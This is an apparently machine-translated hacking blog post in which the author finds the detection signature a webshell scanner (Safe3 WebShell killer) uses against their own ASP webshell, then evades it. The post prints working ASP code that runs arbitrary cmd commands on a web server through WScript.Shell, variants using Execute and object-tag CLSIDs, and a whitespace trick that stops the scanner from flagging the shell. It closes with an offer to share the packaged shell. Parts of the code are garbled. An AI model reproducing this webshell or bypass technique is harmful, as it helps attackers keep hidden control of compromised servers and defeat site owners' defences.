Clever breakthrough in web Anti-Virus

Today, I have nothing to worry about on the ghost blog. I saw the ghost introduced a tool called "Web anti-virus v1.1". The details are as follows: safe3 WebShell killer is a completely green and free web code scanning and removal software first launched in China. Its unique smart scanning technology can effectively scan various webshells such as asp, php, jsp, and aspx, it makes up for the shortcomings that anti-virus software cannot completely scan and kill webshells, and brings the good news to the majority of webmasters. Open tool interface 1. I personally think the interface is quite good, refreshing, and easy to use. I will not introduce it. This reminds me of a webshell I previously wrote. It is an ASP WEBSHELL and can be used by myself due to poor writing. So I used this tool to check my Trojan Horse. Result 2 is displayed. Now I am curious. What is the feature character used in this tool for searching? Next we will start testing.
In fact, the method for finding the pattern of a text file is similar to that of an EXE file. For text files, part of the text content is first put into a new file for scanning and removal. if the content is killed, the range is reduced. Finally, the range is determined to be within a small range, it's the signature. The same is true for the method I used this time. First, I divide my Trojan horse into two parts, and put the first part in the new file for scanning and killing. The result shows that no Trojan horse can be found, the signature is in the second part. Use the same method to put the second part of the content in the new file for killing. Result 3. It was killed, and the next step was to do the same thing! Split the existing signature into two parts. Put the first part in the 1. asp file. If the content is killed, the signature is in the first half. Otherwise, the content is in the second half. I will not waste everyone's time. The final result is that the signature is probably:
If Request. Form ("shellpath") <> "" then
ShellPath = Request. Form ("shellpath ")
If Request. Form ("cmdec") <> "" Then
Defcmd = Request. Form ("cmdec ")
On Error Resume Next
Set ws = Server. CreateObject ("WScript. Shell ")
Set fso = Server. CreateObject ("Scripting. FileSystemObject ")
SzTempFile = server. mappath ("cmd.txt ")
Call ws. Run (ShellPath & "/c" & DefCmd & ">" & szTempFile, 0, True)
Set fs = Server. CreateObject ("Scripting. FileSystemObject ")
Set oFilelcx = fs. OpenTextFile (szTempFile, 1, False, 0)
Aaa = Server. HTMLEncode (oFilelcx. ReadAll)
OFilelcx. Close
Call fs. DeleteFile (szTempFile, True)
End if
This code is used to execute the CMD command, and the trojan type reported by the detection program is "ASP Command Execution Trojan", so there is basically no error. After repeated tests, we found that the signature is:
Call ws. Run (ShellPath & "/c" & DefCmd & ">" & szTempFile, 0, True)
I changed "run" to "RAN", and found that it was no longer killed. Now we have found the culprit, and the next step is how to eliminate it.
The first thing I think of is to execute "RUN" as a character, so that we can split the run and execute it. The specific operation is to change the code:
<%
A = "call ws. r" & "un (" & shellpath & "/c" & defcmd & ">" & zTempFile & ", 0, True )"
Execute
%>
I thought this would be a breakthrough, but the results will still be scanned and killed, but the results of the report have changed to 5. This is because it is regarded as a Trojan. Think about it too, because "execute" is used. So I tried "eval" and "Server. Execute" again and found that they would all be scanned and killed. Then I thought of the classid method, because Wscript can also be used in this method. The specific code is:
<Object runat = "server" id = "ws" scope = "page" classid = "clsid: 72c24dd5-d70a-438b-8a42-98417b88afb8"> </object>
<Object runat = "server" id = "ws" scope = "page" classid = "clsid: F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"> </object>
Ws. run ..................
But it will still be detected, and this will be depressing. It seems that the file signature is concentrated on "*. run. It was a headache. the method I could think of at the time was to remove this code, but it would be meaningless.
After thinking for a while, I think that since the program is eyeing "*. run", what if I change it to "*. run? Note that there are a few more spaces here. First, you must test whether the ASP program can run normally. After testing, we found that the program can still run. After modification, we can still execute the CMD command, 6. In the same way, the web anti-virus service can no longer detect trojans. Now our kill-free solution has been successful. I believe there must be other good methods. I will package ASPSHELL and programs. I will study it together if you are interested! You are also welcome to contact me at the XFile Forum. My ID is EchoEye.